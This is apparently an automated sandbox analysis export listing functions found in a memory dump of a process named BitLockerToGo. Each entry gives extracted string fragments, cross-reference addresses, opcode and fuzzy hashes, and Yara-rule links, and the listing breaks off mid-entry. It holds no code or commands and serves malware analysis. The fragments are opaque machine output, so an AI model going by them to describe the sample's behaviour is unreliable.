String ID: $!by*$$$)*+$$123X$1X74$45$5670$;:54$=n=c$H$PQRS$Xqrs$\]^_$`abc$eyv$sDK}$vv@
API String ID: 0-744883782
Opcode ID: c229f77fb4dde2aeda0d8500a780d2b96b94c98019c88d2c63e43e3da62988bc
Instruction ID: 1b15bb1a847ad30610cce9acb8caa6647067d7ad15c9c1d0ffbf0153a392e0ce
Opcode Fuzzy Hash: c229f77fb4dde2aeda0d8500a780d2b96b94c98019c88d2c63e43e3da62988bc
Instruction Fuzzy Hash: 93B2D1706083918FD735CF25D8907ABBBE1AFD6304F58892EE4C98B392D7788449CB56

Function 00401000 Relevance: 19.5, Strings: 14, Instructions: 1989COMMON

Download Yara Rule

Strings

, xrefs: 00403826
0123456789ABCDEFXP, xrefs: 004013EC, 0040145F
, xrefs: 004037A2
, xrefs: 0040378D
gfff, xrefs: 00401D18
, xrefs: 004037B0
0123456789abcdefxp, xrefs: 004013FA, 0040146C
, xrefs: 0040379B
, xrefs: 00403794
, xrefs: 004037A9
gfff, xrefs: 00401DBF
gfff, xrefs: 00401D75
-, xrefs: 00401CCD
gfff, xrefs: 00401D03

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: $ $ $ $ $ $ $-$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff$gfff$gfff
API String ID: 0-3131871939
Opcode ID: 8d5e88b3c21fcc771f24b2529e4533188e40b42acd8efb67ea5d129d5fbbf216
Instruction ID: 82a1047e918a4e78821797639cc0c6063c4209a2a2cc243c20951bfdc3e4a492
Opcode Fuzzy Hash: 8d5e88b3c21fcc771f24b2529e4533188e40b42acd8efb67ea5d129d5fbbf216
Instruction Fuzzy Hash: 0DE2D2716083418FC718CF28C49436BBBE2AF95314F18867EE495AB3D1D778D949CB8A

Function 00439BA0 Relevance: 17.8, Strings: 14, Instructions: 304COMMON

Download Yara Rule

Strings

?, xrefs: 00439C5B
6, xrefs: 00439DEF
<, xrefs: 00439BAF
D, xrefs: 00439D0A
>, xrefs: 00439BB9
?, xrefs: 00439BB4
', xrefs: 00439E77
}, xrefs: 00439D14
<, xrefs: 00439C56
I, xrefs: 00439D0F
~, xrefs: 00439D05
>, xrefs: 00439C60
(, xrefs: 00439DF4
2, xrefs: 00439E72

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: '$($2$6$<$<$>$>$?$?$D$I$}$~
API String ID: 0-1549446310
Opcode ID: 367a348c16854c040ed8a8e1c50337844c82badbceb661a6883815d7b6a28ffd
Instruction ID: 284a92584b773d254e75b6d6d711cb52ec639c802491b0f2c62b9d7922dfc39a
Opcode Fuzzy Hash: 367a348c16854c040ed8a8e1c50337844c82badbceb661a6883815d7b6a28ffd
Instruction Fuzzy Hash: D4B1082390D7D14AD311857D888524BEEC21BE7228F2E8BAEE5E4D73C6D5ADCC068357

Function 004012D5 Relevance: 16.0, Strings: 12, Instructions: 987COMMON

Download Yara Rule

Strings

0000, xrefs: 004027BA
0, xrefs: 004021FF
0000, xrefs: 0040280E
@, xrefs: 004029AF
0, xrefs: 00402151
0000, xrefs: 004027A5
0000, xrefs: 004027C8
0000, xrefs: 004027AC
0000, xrefs: 004027C1
0, xrefs: 00402449
0000, xrefs: 004027B3
i, xrefs: 00402A7E

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 0$0$0$0000$0000$0000$0000$0000$0000$0000$@$i
API String ID: 0-3385986306
Opcode ID: 463e9afdf012da67d84867e87a37cec8d83071b3943f87856e8a01a6767cd0ff
Instruction ID: 43567f08c2414d3a819ad9695f197ad83829e26c61288a5e6a0b7cb6c91f239b
Opcode Fuzzy Hash: 463e9afdf012da67d84867e87a37cec8d83071b3943f87856e8a01a6767cd0ff
Instruction Fuzzy Hash: 8282D5756093418FC719CF28C69431ABBE1AB85304F18896EE8D5A73D1D3B8DD05CB8A

Function 0042AA40 Relevance: 11.0, APIs: 1, Strings: 5, Instructions: 523COMMON

Download Yara Rule

Strings

D4'2, xrefs: 0042B66E
t|, xrefs: 0042B4CF
;:54, xrefs: 0042B75C
3L,S, xrefs: 0042B67E
gw, xrefs: 0042B4BF

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 3L,S$;:54$D4'2$gw$t|
API String ID: 0-148604455
Opcode ID: b6a5bcbc9e7952400bc449c7c29792027bb1d80a963eeb7271538c153ee93d5e
Instruction ID: 33cda5058ecfcda83a8ae49a4051d765de37c74bc4d0c890624df7c0bc77531d
Opcode Fuzzy Hash: b6a5bcbc9e7952400bc449c7c29792027bb1d80a963eeb7271538c153ee93d5e
Instruction Fuzzy Hash: 99F122B66083508FD3249F25D88166BBBE1FFC6315F448A2DE5C59B391D7788901CB86

Function 0041ECDE Relevance: 11.0, APIs: 1, Strings: 5, Instructions: 521COMMON

Download Yara Rule

Strings

;:54, xrefs: 0041F169
;:54, xrefs: 0041ED36
;:54, xrefs: 0041F209
;:54, xrefs: 0041EF8C
;:54, xrefs: 0041F0B7

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID: ;:54$;:54$;:54$;:54$;:54
API String ID: 2994545307-1306776023
Opcode ID: a1c4bc155694037db096d5376c81496c1941f374db6816183eda17924910fa6e
Instruction ID: 7a1c93435aac4f4fc6971621666823cbdd623ae048940ead9436b97a0d7840c7
Opcode Fuzzy Hash: a1c4bc155694037db096d5376c81496c1941f374db6816183eda17924910fa6e
Instruction Fuzzy Hash: F1F12C37648340DBD724CB14D8816BBB7A6EB8B704F18493DDAC657752D339DC828B8A

Function 0040D760 Relevance: 10.3, Strings: 8, Instructions: 302COMMON

Download Yara Rule

Strings

^\V^, xrefs: 0040D919
9tWU, xrefs: 0040DA83
^, xrefs: 0040DA92
UW, xrefs: 0040DA8B
ALC:, xrefs: 0040D931
UQGq, xrefs: 0040D929
JHz~, xrefs: 0040DA63
<194, xrefs: 0040DA73

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 9tWU$<194$ALC:$JHz~$UQGq$UW$^$^\V^
API String ID: 0-3233791986
Opcode ID: 1b76c00ea30690e806b229d34a8721d4fbe8444d2ee39c48be022f5bad116e41
Instruction ID: b1eacd1aeb04024258053d881981a07c5dce1dbb9a9a3888654d93c7e6aa82d9
Opcode Fuzzy Hash: 1b76c00ea30690e806b229d34a8721d4fbe8444d2ee39c48be022f5bad116e41
Instruction Fuzzy Hash: 0591AF7190D3918FD321CF69945035BBFE0AF96704F0889ADE4D99B392C739C90ACB96

Function 0040D500 Relevance: 10.2, Strings: 8, Instructions: 218COMMON

Download Yara Rule

Strings

x|.", xrefs: 0040D5DA
sp$., xrefs: 0040D69D
s$>%, xrefs: 0040D5E2
&%9b, xrefs: 0040D5F2
9&!:, xrefs: 0040D5EA
)vBW, xrefs: 0040D572
*#1/, xrefs: 0040D602
x, xrefs: 0040D64A

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: &%9b$)vBW$*#1/$9&!:$s$>%$sp$.$x$x|."
API String ID: 0-2964809603
Opcode ID: e15111653fabfa8ae9ca1ff26d6d509ab9527342194df1257f5b8c1e77c5e471
Instruction ID: 0245b1b87f528dc33afc8e654017f442f228954418cf843cd2d284c2b8725095
Opcode Fuzzy Hash: e15111653fabfa8ae9ca1ff26d6d509ab9527342194df1257f5b8c1e77c5e471
Instruction Fuzzy Hash: E451E17450D3C08BD315CF2994A07ABBFE0AF93305F1899ADE4D55B391D27A880ECB66

Function 0040F250 Relevance: 9.2, Strings: 7, Instructions: 471COMMON

Download Yara Rule

Strings

EqLs, xrefs: 0040F330
vIyK, xrefs: 0040F518
N=G?, xrefs: 0040F4FA
w%G', xrefs: 0040F4E6
DuVw, xrefs: 0040F337
^9[;, xrefs: 0040F4F0
zMNO, xrefs: 0040F522

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: DuVw$EqLs$N=G?$^9[;$vIyK$w%G'$zMNO
API String ID: 0-2443247208
Opcode ID: da24ea48b29dae71cc3cd9e4296eb4ff0ffe8ae93a073f7e1e6a7e5757cae6c9
Instruction ID: 9a8d52249914085041d5bef5be9f575354343964f2c2744fa35b8fb3767dc793
Opcode Fuzzy Hash: da24ea48b29dae71cc3cd9e4296eb4ff0ffe8ae93a073f7e1e6a7e5757cae6c9
Instruction Fuzzy Hash: 6F1233B5200B40DFE3348F25D885B93BBE5FB45314F148A2DD5AA9BBA0D774B809CB94

Function 0040DB20 Relevance: 9.1, Strings: 7, Instructions: 361COMMON

Download Yara Rule

Strings

4A03C088025BBC2232B7EF3D1DE0FD84, xrefs: 0040DC11
\_, xrefs: 0040DF92
Zb, xrefs: 0040DE0C
hVkg, xrefs: 0040DC0B, 0040DC16
U\, xrefs: 0040DFDA, 0040DFDE
`, xrefs: 0040DCDC
Lk, xrefs: 0040DE24

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 4A03C088025BBC2232B7EF3D1DE0FD84$Lk$U\$Zb$\_$`$hVkg
API String ID: 0-1208929096
Opcode ID: fc18d00ef4708656815e91e34590c1a645cdcee8500b9a00e0ca239a59fa83f5
Instruction ID: 65b782ff3cfb668798d2e5c29e4dd668e9f95a1263f09a0ae2978b59750cbcd0
Opcode Fuzzy Hash: fc18d00ef4708656815e91e34590c1a645cdcee8500b9a00e0ca239a59fa83f5
Instruction Fuzzy Hash: F4C1E0B160C3409FE320DF65D88179BBBE2EBD5318F14892DE1C59B392DA78C5098B97

Function 00420A24 Relevance: 8.0, Strings: 6, Instructions: 505COMMON

Download Yara Rule

Strings

RR, xrefs: 00420CB1
_W, xrefs: 00420CAA
_W, xrefs: 00420DCD, 00420EE0
us, xrefs: 00420B12
OI, xrefs: 00420CA3
}z{, xrefs: 00420B20

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: OI$RR$_W$_W$us$}z{
API String ID: 0-2933034762
Opcode ID: dbc94b26cc24c12ae6e0af78e290e2cf9f493228038982160526c5644b26fc73
Instruction ID: e45c231426048a3791f950d754e296b2fda12a8ad2c2968a0dd2a51155b189b5
Opcode Fuzzy Hash: dbc94b26cc24c12ae6e0af78e290e2cf9f493228038982160526c5644b26fc73
Instruction Fuzzy Hash: 57F144B2A113158FCB14CFA9DC8129EBBF2FF84314F18866DD494AB342D7789946CB94

Function 004241E0 Relevance: 8.0, Strings: 6, Instructions: 461COMMON

Download Yara Rule

Strings

GB, xrefs: 00424707
){zy, xrefs: 00424385
)B, xrefs: 0042428C
sq, xrefs: 00424375
)6, xrefs: 00424294
|~, xrefs: 00424284

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: GB$){zy$)6$)B$|~$sq
API String ID: 0-1292531311
Opcode ID: 4e9632e30ef22d1c9d691365c99381acfbe6c67ba9f7670632b71d0e3dce93d0
Instruction ID: 71584c7dd643340a7c9b4b8dcbaefec527e76613856c743693e70a6483ef5efc
Opcode Fuzzy Hash: 4e9632e30ef22d1c9d691365c99381acfbe6c67ba9f7670632b71d0e3dce93d0
Instruction Fuzzy Hash: E1C123B16083208BD724DF25E85276BB7F1EFD2354F588A1DE4D58B390EB389805CB96

Function 0043EC20 Relevance: 7.0, Strings: 5, Instructions: 723COMMON

Download Yara Rule

Strings

InA>, xrefs: 0043F080
InA>, xrefs: 0043ED00
;:54, xrefs: 0043EE60
f, xrefs: 0043EEC9
;:54, xrefs: 0043ECDD

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID: ;:54$;:54$InA>$InA>$f
API String ID: 2994545307-3857589079
Opcode ID: 080d9af42f4c37effe9ab90e5c0ef4e64d77d33efb89154e7effecf640c2680e
Instruction ID: 56a88b0ecb111c424daf97a0bea17532dc925db709df433a4c09b8ba664e1611
Opcode Fuzzy Hash: 080d9af42f4c37effe9ab90e5c0ef4e64d77d33efb89154e7effecf640c2680e
Instruction Fuzzy Hash: AA32C272A093419FD714CF19C880B2BBBE2ABD8314F18DA2EF99587395D778D805CB46

Function 00422E50 Relevance: 6.9, Strings: 5, Instructions: 655COMMON

Download Yara Rule

Strings

B@B, xrefs: 004237FD
?B, xrefs: 004236FF
<B, xrefs: 004235B1
,B, xrefs: 0042357D, 004235F3, 00423627, 0042365B, 00423679, 004236C3, 004236E1, 00423715, 00423733, 00423751, 0042376F, 004237A3, 004237C1, 004237DF, 0042383F, 00423857, 00423875, 0042388D
@B, xrefs: 004236AD

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: ,B$B@B$<B$?B$@B
API String ID: 0-2920917204
Opcode ID: d8440cbb4b77aad3969ae75d57a1c98d9659c9b343fe814aac1f906438c735ec
Instruction ID: e6a6ac5460eaa37fd23bd5207eaf5309fc8b69e4a5928999c4f7e6849a782bf3
Opcode Fuzzy Hash: d8440cbb4b77aad3969ae75d57a1c98d9659c9b343fe814aac1f906438c735ec
Instruction Fuzzy Hash: 53625FB0508B808ED372CB3C8845797BFE5AB5A314F084A9ED0EE87392C779B545C766

Function 0040ECC0 Relevance: 6.7, Strings: 5, Instructions: 426COMMON

Download Yara Rule

Strings

f\nf, xrefs: 0040F036
\XTR, xrefs: 0040ECD2
52, xrefs: 0040EEEA
ngfa, xrefs: 0040EE26
`a, xrefs: 0040EE78

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 52$\XTR$`a$f\nf$ngfa
API String ID: 0-1621357096
Opcode ID: f7cbfa4182acf656bc8b2ebfa80ff0ffbbd9df5804de2fdec8136187ba78dae2
Instruction ID: 13da5bd78e7ce79080f5372259b0cd9e2655cdfb09c82be89c4a805d6217edf1
Opcode Fuzzy Hash: f7cbfa4182acf656bc8b2ebfa80ff0ffbbd9df5804de2fdec8136187ba78dae2
Instruction Fuzzy Hash: 65D1067160C3518BD324CF29C45136BFBE1ABC1714F28893EE4D5AB382D779890A9B96

Function 00429D00 Relevance: 6.7, Strings: 5, Instructions: 405COMMON

Download Yara Rule

Strings

EG, xrefs: 00429E92
IJK, xrefs: 00429E9D
uw, xrefs: 00429E0E
;:54, xrefs: 00429FCC
;:54, xrefs: 0042A1FC

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: ;:54$;:54$EG$IJK$uw
API String ID: 0-855178105
Opcode ID: dab2f3fb995e67b703429ecdd96fdbb6b067705f13c9e52208532b194843f1c2
Instruction ID: dfa1f900b60cdef9db41b8a31a1a0e7c8880f20d2cda8bdb20d96d212affb2c9
Opcode Fuzzy Hash: dab2f3fb995e67b703429ecdd96fdbb6b067705f13c9e52208532b194843f1c2
Instruction Fuzzy Hash: 67E132B6609341DFE7248F24E88176BBBA1FBC6304F18892DE9C58B251D7359815CB87

Function 00401328 Relevance: 6.6, Strings: 5, Instructions: 389COMMON

Download Yara Rule

Strings

0123456789ABCDEFXP, xrefs: 00401328
gfff, xrefs: 00401F12
-, xrefs: 00401ED7
gfff, xrefs: 00401F77
0123456789abcdefxp, xrefs: 00401332

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff
API String ID: 0-3620105454
Opcode ID: fa93bc9afbd1dd26882519429843d715e2f6a0870b720133efd4587a99214889
Instruction ID: 6228947b6d7ac37e7fb11b7b9880174d7147137a33e500ddd703e64affd2d01d
Opcode Fuzzy Hash: fa93bc9afbd1dd26882519429843d715e2f6a0870b720133efd4587a99214889
Instruction Fuzzy Hash: 78E1A07160C3918FC715CF29C48026AFBE1AFD9314F088A7EE8D997392D278D945CB96

Function 004255A4 Relevance: 6.4, Strings: 5, Instructions: 157COMMON

Download Yara Rule

Strings

5, xrefs: 0042561E
;, xrefs: 00425614
e, xrefs: 00425738
4, xrefs: 00425623
:, xrefs: 00425619

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 4$5$:$;$e
API String ID: 0-2923545159
Opcode ID: 06d060b76393e989736b2ffb55c100980e14fface055dc7eced0861046141d46
Instruction ID: 389318b344b966557f996e6eb491a2e34504138fc9165e7a7f8408b7ee6eb11c
Opcode Fuzzy Hash: 06d060b76393e989736b2ffb55c100980e14fface055dc7eced0861046141d46
Instruction Fuzzy Hash: C251CE7660CB908BD320CA68D44435BBBD1ABD6328F694A6ED4E5C73C2C27DC846CB57

Function 0041E298 Relevance: 6.3, APIs: 4, Instructions: 347COMMON

Download Yara Rule

APIs

FindWindowExW.USER32(00000000,?,A3D19DEA,00000000), ref: 0041E410

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: FindWindow
String ID:
API String ID: 134000473-0
Opcode ID: 611df0e037769dfec0ccbd250f884b13fa727b7773da6a687875ef7a21337769
Instruction ID: 8cc40bb880943b3fdd4a09bf692fc47349ab873484ee8d2c9c2d8e6455f3c944
Opcode Fuzzy Hash: 611df0e037769dfec0ccbd250f884b13fa727b7773da6a687875ef7a21337769
Instruction Fuzzy Hash: 21D1E2796083518FC725CF29D84069FBBE2EFC9308F08896EE4859B391DB74D945CB86

Function 00428F00 Relevance: 5.5, Strings: 4, Instructions: 489COMMON

Download Yara Rule

Strings

TeVg, xrefs: 00428B17
pq, xrefs: 00428B35
HyJ{, xrefs: 00428B1F
;:54, xrefs: 00428980

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: ;:54$HyJ{$TeVg$pq
API String ID: 0-3800776496
Opcode ID: b59a32591fe918d7366cfb9ad6e33efc92948c6b11b36bca78c2caa055b05ea7
Instruction ID: 937f9a8cfd1e2d128634e98be9aa3ff82b67fd992892cbc4a13105e05eec71b6
Opcode Fuzzy Hash: b59a32591fe918d7366cfb9ad6e33efc92948c6b11b36bca78c2caa055b05ea7
Instruction Fuzzy Hash: 9BF10176A093628BC320CF24C8806AFB3A2FFC5744F59886DD4C55B324DB749946DB8A

Function 0042D642 Relevance: 5.3, Strings: 4, Instructions: 333COMMON

Download Yara Rule

Strings

zD{B, xrefs: 0042D538
@z., xrefs: 0042D7F6
Fx~F, xrefs: 0042D587
;:54, xrefs: 0042D98C, 0042D6F9, 0042D706

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: @z.$;:54$Fx~F$zD{B
API String ID: 0-1365873924
Opcode ID: b80536d0911519ded31ae6ba384b7df0aff2b2972353d9cd6a08b312a24a2798
Instruction ID: 954045d9e71a5cb27ea62ed2081712890fa2efa30d5908e6a67e8c995107ee74
Opcode Fuzzy Hash: b80536d0911519ded31ae6ba384b7df0aff2b2972353d9cd6a08b312a24a2798
Instruction Fuzzy Hash: 47B137756083808FD3049F29A89166B7BE2EFD6318F584A6EF4D447392D739C905CB4A

Function 00442EB0 Relevance: 4.8, Strings: 3, Instructions: 1010COMMON

Download Yara Rule

Strings

"5D, xrefs: 004434F8
@3D, xrefs: 0044336E
G3D, xrefs: 0044331A

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: "5D$@3D$G3D
API String ID: 0-1898335559
Opcode ID: ca7d18b9f0ece28521e7f188a6aa14edef678a902b8fcebda9fba9b38294a369
Instruction ID: ce56d9e6797e6fc455282548f9e4f7f68bba8f0454dcdd091ad8ff22b9dad6c1
Opcode Fuzzy Hash: ca7d18b9f0ece28521e7f188a6aa14edef678a902b8fcebda9fba9b38294a369
Instruction Fuzzy Hash: CD62F039A04211CFDB08CF68D8916AEB7F2FB8A315F19817ED846A7395D734AD05CB84

Function 004431D0 Relevance: 4.4, Strings: 3, Instructions: 680COMMON

Download Yara Rule

Strings

"5D, xrefs: 004434F8
@3D, xrefs: 0044336E
G3D, xrefs: 0044331A

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: "5D$@3D$G3D
API String ID: 0-1898335559
Opcode ID: a598e15b9f950c49bbc2326d93c3944d1d2eb3f819a396320624b7d3d119b0a3
Instruction ID: 0d27d5ca0624dddcec474f96472bfb5c1ea38ed4ad0558f269f9c7dbbb12b3c7
Opcode Fuzzy Hash: a598e15b9f950c49bbc2326d93c3944d1d2eb3f819a396320624b7d3d119b0a3
Instruction Fuzzy Hash: BF12FF39A05211CFDB18CF68D8906AEB7F2FB8A315F19847DC946A7352D335AD06CB84

Function 00421B40 Relevance: 4.4, Strings: 3, Instructions: 657COMMON

Download Yara Rule

Strings

;:54, xrefs: 00421C79
;:54, xrefs: 00421CEE
s}, xrefs: 00421C18

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID: ;:54$;:54$s}
API String ID: 2994545307-2837035532
Opcode ID: 9df98e736ffcd3d527ee05afaf5ce9d017e9f9254f793c40ca85cc5ce89bb78d
Instruction ID: 663f8f0829c23ecb73308a959951e136473ffcabccf44f1e6a246336cf4c5ef0
Opcode Fuzzy Hash: 9df98e736ffcd3d527ee05afaf5ce9d017e9f9254f793c40ca85cc5ce89bb78d
Instruction Fuzzy Hash: 2E2220716083509BE720CF25D981B6FB7E2FBC5704F54882EEA859B391D778E801CB5A

Function 004432C0 Relevance: 4.4, Strings: 3, Instructions: 637COMMON

Download Yara Rule

Strings

"5D, xrefs: 004434F8
@3D, xrefs: 0044336E
G3D, xrefs: 0044331A

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: "5D$@3D$G3D
API String ID: 0-1898335559
Opcode ID: 17224c73dc5f5cce02b72de51cf9a04c92f2e2c01acddb2e884a7e03e58e1cd1
Instruction ID: f5333144ef70c2a173cc619d7536ed6f405604b094df42d2374a6f5ff99be012
Opcode Fuzzy Hash: 17224c73dc5f5cce02b72de51cf9a04c92f2e2c01acddb2e884a7e03e58e1cd1
Instruction Fuzzy Hash: 2C020F39A05211CFDB18CF68D8906AEB7F2FB8A315F19847DD846A7342D335AD06CB94

Function 0042AC04 Relevance: 4.3, Strings: 3, Instructions: 578COMMON

Download Yara Rule

Strings

SRP\, xrefs: 0042B030
YB]G, xrefs: 0042B048
TU, xrefs: 0042B338

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: SRP\$TU$YB]G
API String ID: 0-3716301176
Opcode ID: 5bb14eefcdfe82c0fe0139c8d462f47c3a2ca31c9906138fdde2f92c6f65c02a
Instruction ID: 2ab5dbaa93f2d707f6f6e66add1144ac258b2aec8bad53236f1827fb2ff53458
Opcode Fuzzy Hash: 5bb14eefcdfe82c0fe0139c8d462f47c3a2ca31c9906138fdde2f92c6f65c02a
Instruction Fuzzy Hash: 560236B5608351CFC7049F25D89126BB7E2EFD6305F08892EE8C597391E378D906CB9A

Function 00442850 Relevance: 4.2, Strings: 3, Instructions: 475COMMON

Download Yara Rule

Strings

P, xrefs: 004429E1
3, xrefs: 00442CBE
InA>, xrefs: 00442BB0

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: InA>$P$3
API String ID: 0-4254740818
Opcode ID: fcf20bbfab756445085a6f726981e2366c9fab2c199bbe250211e8c4bbc25061
Instruction ID: c49307426a9e1b27938c0b9fc736e9bb6ecdf73bca4986355502bea0bcc95e43
Opcode Fuzzy Hash: fcf20bbfab756445085a6f726981e2366c9fab2c199bbe250211e8c4bbc25061
Instruction Fuzzy Hash: DCF127726083614FE325CE28985035FF7E2EBC5714F558A3DE8A59B391CBB8C84687C6

Function 00408340 Relevance: 4.2, Strings: 3, Instructions: 420COMMON

Download Yara Rule

Strings

IEND, xrefs: 004087AC
), xrefs: 004083C6
), xrefs: 004083BC

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: )$)$IEND
API String ID: 0-588110143
Opcode ID: 3a96be541c954f44124682894656954c58ed72ccd519f5141568388bf05ddf30
Instruction ID: 950f70766846ba8b3ef2f3dab1fa2579cfa5705e18552adaceaeeb1ec68e984c
Opcode Fuzzy Hash: 3a96be541c954f44124682894656954c58ed72ccd519f5141568388bf05ddf30
Instruction Fuzzy Hash: EEF1C171A087019BD314DF28C88171BBBE0BB95314F14463EE9D5A73C2DB78E914CB8A

Function 0042C3E0 Relevance: 4.0, Strings: 3, Instructions: 221COMMON

Download Yara Rule

Strings

Uqrs, xrefs: 0042C40A
cba, xrefs: 0042C594
Ea#c, xrefs: 0042C458

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: Ea#c$Uqrs$cba
API String ID: 0-809142158
